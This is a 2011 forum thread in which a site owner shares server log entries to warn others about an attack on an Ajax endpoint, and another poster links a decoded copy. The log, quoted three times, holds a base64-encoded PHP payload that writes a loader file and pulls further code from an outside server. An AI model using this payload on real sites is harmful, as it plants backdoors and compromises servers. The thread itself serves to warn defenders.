ajax code injection hacking attempt

Discussion in 'Javascript' started by me, Sep 7, 2011.

  1. me

    me Guest

    :)

    I came across this in my log files today, and thought I'd warn people who
    use Ajax. (Could be a well documented thing, I don't know where to check)

    77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
    /engine/ajax/updates.php?wert=1&user_id=QGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOwoKJHVwbG9hZERpciA9ICcuLi8uLi91cGxvYWRzJzsKJGxvYWRlck5hbWUgPSAnbG9hZGVyei4zNDQwNDY5M2JiNzE4ZmFmZDg1NzI3MTg4M2M2NmQ3Ni5waHAnOwoKaWYgKGlzX2RpcigkdXBsb2FkRGlyKSkKewoJJGZwID0gZm9wZW4oIiR1cGxvYWREaXIvJGxvYWRlck5hbWUiLCAndycpOwoJZndyaXRlKCRmcCwgYmFzZTY0X2RlY29kZSgnUEQ5d2FIQUtDa0JwYm1sZmMyVjBLQ2RoYkd4dmQxOTFjbXhmWm05d1pXNG5MQ0F4S1RzS0NpUnZiR1JFYVhJZ1BTQW5ZbkJyZEdWdkp6c0tKRzVsZDBScGNpQTlJQ2RpY0d0MFpXOG5Pd29rYkc5aFpHVnlUbUZ0WlNBOUlDZHNiMkZrWlhKNkxqTTBOREEwTmprelltSTNNVGhtWVdaa09EVTNNamN4T0Rnell6WTJaRGMyTG5Cb2NDYzdDZ3BBWlhobFl5Z2ljbTBnTFhKbUlDUnZiR1JFYVhJZ0pHNWxkMFJwY2lBcWJHOWhaR1Z5ZWlvaUtUc0tRSE41YzNSbGJTZ2ljbTBnTFhKbUlDUnZiR1JFYVhJZ0pHNWxkMFJwY2lBcWJHOWhaR1Z5ZWlvaUtUc0tRSEp0WkdseUtDUnZiR1JFYVhJcE93cEFjbTFrYVhJb0pHNWxkMFJwY2lrN0NrQjFibXhwYm1zb0pHeHZZV1JsY2s1aGJXVXBPd29LYVdZZ0tDRkFhWE5mWkdseUtDUnVaWGRFYVhJcEtRcDdDZ2trYjJ4a1gzVnRZWE5ySUQwZ1FIVnRZWE5yS0RBcE93b0pRRzFyWkdseUtDUnVaWGRFYVhJc0lEQTNOemNwT3dvSlFIVnRZWE5yS0NSdmJHUmZkVzFoYzJzcE93a0tDVUJsZUdWaktDSmphRzF2WkNBM056Y2dKRzVsZDBScGNpSXBPd3A5Q2dwcFppQW9RR2x6WDJScGNpZ2tibVYzUkdseUtTa0tld29KSkdad0lEMGdabTl3Wlc0b0lpUnVaWGRFYVhJdmFXNWtaWGd1Y0dod0lpd2dKM2NuS1RzS0NXWjNjbWwwWlNna1puQXNJRUJpWVhObE5qUmZaR1ZqYjJSbEtHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDZG9kSFJ3T2k4dlpHOW5hWE5sY25abGNpNWpiMjB2WTI5dWRISnZiQzlzYjJGa1pYSXVjR2h3UDNCaGMzTjNiM0prUFVwSVIwSldhbXRvYzJrNGVXaDFOalYwTTNWNVp5WmhZM1JwYjI0OWFXNWtaWGduS1NrcE93b0pabU5zYjNObEtDUm1jQ2s3Q2drSkNnbHBaaUFvUUdacGJHVmZaWGhwYzNSektDSWtibVYzUkdseUwybHVaR1Y0TG5Cb2NDSXBLUW9KZXdvSkNYQnlhVzUwSUNjNU1UYzBOamczTmpJMU5qUTROQ2M3Q2dsOUNna0tDVUIxYm14cGJtc29KR3h2WVdSbGNrNWhiV1VwT3dwOUNnby9QZz09JykpOwoJZmNsb3NlKCRmcCk7CgoJcHJpbnQgJzkxNzQ2ODc2MjU2NDg0JzsKfQ==
    HTTP/1.1" 301 3844 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
    SV1; .NET CLR 1.1.4322)"
    77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "POST
    /engine/ajax/keywords.php HTTP/1.1" 301 457 "-" "Mozilla/4.0 (compatible;
    MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
    /index.php?do=lostpassword&douser=1 HTTP/1.1" 301 481 "-" "Mozilla/4.0
    (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

    Marc.
    me, Sep 7, 2011
    #1
    1. Advertising

  2. On Sep 6, 8:14 pm, "me" <> wrote:
    > :)
    >
    > I came across this in my log files today, and thought I'd warn people who
    > use Ajax. (Could be a well documented thing, I don't know where to check)
    >
    > 77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
    > /engine/ajax/updates.php?wert=1&user_id=QGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOwoKJHVwbG9hZERpciA9ICcuLi8uLi91cGxvYWRzJzsKJGxvYWRlck5hbWUgPSAnbG9hZGVyei4zNDQwNDY5M2JiNzE4ZmFmZDg1NzI3MTg4M2M2NmQ3Ni5waHAnOwoKaWYgKGlzX2RpcigkdXBsb2FkRGlyKSkKewoJJGZwID0gZm9wZW4oIiR1cGxvYWREaXIvJGxvYWRlck5hbWUiLCAndycpOwoJZndyaXRlKCRmcCwgYmFzZTY0X2RlY29kZSgnUEQ5d2FIQUtDa0JwYm1sZmMyVjBLQ2RoYkd4dmQxOTFjbXhmWm05d1pXNG5MQ0F4S1RzS0NpUnZiR1JFYVhJZ1BTQW5ZbkJyZEdWdkp6c0tKRzVsZDBScGNpQTlJQ2RpY0d0MFpXOG5Pd29rYkc5aFpHVnlUbUZ0WlNBOUlDZHNiMkZrWlhKNkxqTTBOREEwTmprelltSTNNVGhtWVdaa09EVTNNamN4T0Rnell6WTJaRGMyTG5Cb2NDYzdDZ3BBWlhobFl5Z2ljbTBnTFhKbUlDUnZiR1JFYVhJZ0pHNWxkMFJwY2lBcWJHOWhaR1Z5ZWlvaUtUc0tRSE41YzNSbGJTZ2ljbTBnTFhKbUlDUnZiR1JFYVhJZ0pHNWxkMFJwY2lBcWJHOWhaR1Z5ZWlvaUtUc0tRSEp0WkdseUtDUnZiR1JFYVhJcE93cEFjbTFrYVhJb0pHNWxkMFJwY2lrN0NrQjFibXhwYm1zb0pHeHZZV1JsY2s1aGJXVXBPd29LYVdZZ0tDRkFhWE5mWkdseUtDUnVaWGRFYVhJcEtRcDdDZ2trYjJ4a1gzVnRZWE5ySUQwZ1FIVnRZWE5yS0RBcE93b0pRRzFyWkdseUtDUnVaWGRFYVhJc0lEQTNOemNwT3dvSlFIVnRZWE5yS0NSdmJHUmZkVzFoYzJzcE93a0tDVUJsZUdWaktDSmphRzF2WkNBM056Y2dKRzVsZDBScGNpSXBPd3A5Q2dwcFppQW9RR2x6WDJScGNpZ2tibVYzUkdseUtTa0tld29KSkdad0lEMGdabTl3Wlc0b0lpUnVaWGRFYVhJdmFXNWtaWGd1Y0dod0lpd2dKM2NuS1RzS0NXWjNjbWwwWlNna1puQXNJRUJpWVhObE5qUmZaR1ZqYjJSbEtHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDZG9kSFJ3T2k4dlpHOW5hWE5sY25abGNpNWpiMjB2WTI5dWRISnZiQzlzYjJGa1pYSXVjR2h3UDNCaGMzTjNiM0prUFVwSVIwSldhbXRvYzJrNGVXaDFOalYwTTNWNVp5WmhZM1JwYjI0OWFXNWtaWGduS1NrcE93b0pabU5zYjNObEtDUm1jQ2s3Q2drSkNnbHBaaUFvUUdacGJHVmZaWGhwYzNSektDSWtibVYzUkdseUwybHVaR1Y0TG5Cb2NDSXBLUW9KZXdvSkNYQnlhVzUwSUNjNU1UYzBOamczTmpJMU5qUTROQ2M3Q2dsOUNna0tDVUIxYm14cGJtc29KR3h2WVdSbGNrNWhiV1VwT3dwOUNnby9QZz09JykpOwoJZmNsb3NlKCRmcCk7CgoJcHJpbnQgJzkxNzQ2ODc2MjU2NDg0JzsKfQ==
    > HTTP/1.1" 301 3844 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
    > SV1; .NET CLR 1.1.4322)"
    > 77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "POST
    > /engine/ajax/keywords.php HTTP/1.1" 301 457 "-" "Mozilla/4.0 (compatible;
    > MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    > 77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
    > /index.php?do=lostpassword&douser=1 HTTP/1.1" 301 481 "-" "Mozilla/4.0
    > (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    >
    > Marc.



    I've decoded the above here: http://pastebin.com/1vwJEUw0
    Michael Haufe (TNO), Sep 7, 2011
    #2
    1. Advertising

  3. me

    me Guest

    "Michael Haufe (TNO)" <> wrote in message
    news:...
    > On Sep 6, 8:14 pm, "me" <> wrote:
    >> :)
    >>
    >> I came across this in my log files today, and thought I'd warn people who
    >> use Ajax. (Could be a well documented thing, I don't know where to check)
    >>
    >> 77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
    >> /engine/ajax/updates.php?>wert=1&user_id=QGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOwoKJHVwbG9hZERpciA9ICcuLi8uLi91cGxvYWRzJzsKJGxvYWRlck5hbWUgPSAnbG9hZGVyei4zNDQwNDY5M2JiNzE4ZmFmZDg1NzI3MTg4M2M2NmQ3Ni5waHAnOwoKaWYgKGlzX2RpcigkdXBsb2FkRGlyKSkKewoJJGZwID0gZm9wZW4oIiR1cGxvYWREaXIvJGxvYWRlck5hbWUiLCAndycpOwoJZndyaXRlKCRmcCwgYmFzZTY0X2RlY29kZSgnUEQ5d2FIQUtDa0JwYm1sZmMyVjBLQ2RoYkd4dmQxOTFjbXhmWm05d1pXNG5MQ0F4S1RzS0NpUnZiR1JFYVhJZ1BTQW5ZbkJyZEdWdkp6c0tKRzVsZDBScGNpQTlJQ2RpY0d0MFpXOG5Pd29rYkc5aFpHVnlUbUZ0WlNBOUlDZHNiMkZrWlhKNkxqTTBOREEwTmprelltSTNNVGhtWVdaa09EVTNNamN4T0Rnell6WTJaRGMyTG5Cb2NDYzdDZ3BBWlhobFl5Z2ljbTBnTFhKbUlDUnZiR1JFYVhJZ0pHNWxkMFJwY2lBcWJHOWhaR1Z5ZWlvaUtUc0tRSE41YzNSbGJTZ2ljbTBnTFhKbUlDUnZiR1JFYVhJZ0pHNWxkMFJwY2lBcWJHOWhaR1Z5ZWlvaUtUc0tRSEp0WkdseUtDUnZiR1JFYVhJcE93cEFjbTFrYVhJb0pHNWxkMFJwY2lrN0NrQjFibXhwYm1zb0pHeHZZV1JsY2s1aGJXVXBPd29LYVdZZ0tDRkFhWE5mWkdseUtDUnVaWGRFYVhJcEtRcDdDZ2trYjJ4a1gzVnRZWE5ySUQwZ1FIVnRZWE5yS0RBcE93b0pRRzFyWkdseUtDUnVaWGRFYVhJc0lEQTNOemNwT3dvSlFIVnRZWE5yS0NSdmJHUmZkVzFoYzJzcE93a0tDVUJsZUdWaktDSmphRzF2WkNBM056Y2dKRzVsZDBScGNpSXBPd3A5Q2dwcFppQW9RR2x6WDJScGNpZ2tibVYzUkdseUtTa0tld29KSkdad0lEMGdabTl3Wlc0b0lpUnVaWGRFYVhJdmFXNWtaWGd1Y0dod0lpd2dKM2NuS1RzS0NXWjNjbWwwWlNna1puQXNJRUJpWVhObE5qUmZaR1ZqYjJSbEtHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDZG9kSFJ3T2k4dlpHOW5hWE5sY25abGNpNWpiMjB2WTI5dWRISnZiQzlzYjJGa1pYSXVjR2h3UDNCaGMzTjNiM0prUFVwSVIwSldhbXRvYzJrNGVXaDFOalYwTTNWNVp5WmhZM1JwYjI0OWFXNWtaWGduS1NrcE93b0pabU5zYjNObEtDUm1jQ2s3Q2drSkNnbHBaaUFvUUdacGJHVmZaWGhwYzNSektDSWtibVYzUkdseUwybHVaR1Y0TG5Cb2NDSXBLUW9KZXdvSkNYQnlhVzUwSUNjNU1UYzBOamczTmpJMU5qUTROQ2M3Q2dsOUNna0tDVUIxYm14cGJtc29KR3h2WVdSbGNrNWhiV1VwT3dwOUNnby9QZz09JykpOwoJZmNsb3NlKCRmcCk7CgoJcHJpbnQgJzkxNzQ2ODc2MjU2NDg0JzsKfQ==
    >> HTTP/1.1" 301 3844 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
    >> 5.1;
    >> SV1; .NET CLR 1.1.4322)"
    >> 77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "POST
    >> /engine/ajax/keywords.php HTTP/1.1" 301 457 "-" "Mozilla/4.0 (compatible;
    >> MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    >> 77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
    >> /index.php?do=lostpassword&douser=1 HTTP/1.1" 301 481 "-" "Mozilla/4.0
    >> (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    >>
    >> Marc.

    >
    > I've decoded the above here: http://pastebin.com/1vwJEUw0


    Thanks; googling their server name reveals it's a known attack that's been
    around since 2009; more info at: http://pastebin.com/Qtk8jSfR

    Marc.
    me, Sep 7, 2011
    #3
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. minnie
    Replies:
    1
    Views:
    672
    Andrew Thompson
    Dec 13, 2006
  2. Guest
    Replies:
    7
    Views:
    514
    Guest
    Mar 16, 2007
  3. GMI
    Replies:
    3
    Views:
    484
    Tad McClellan
    Jun 19, 2005
  4. e.expelliarmus
    Replies:
    1
    Views:
    246
    A. Sinan Unur
    Sep 25, 2007
  5. Adam Stanton
    Replies:
    0
    Views:
    209
    Adam Stanton
    Sep 3, 2013
Loading...

Share This Page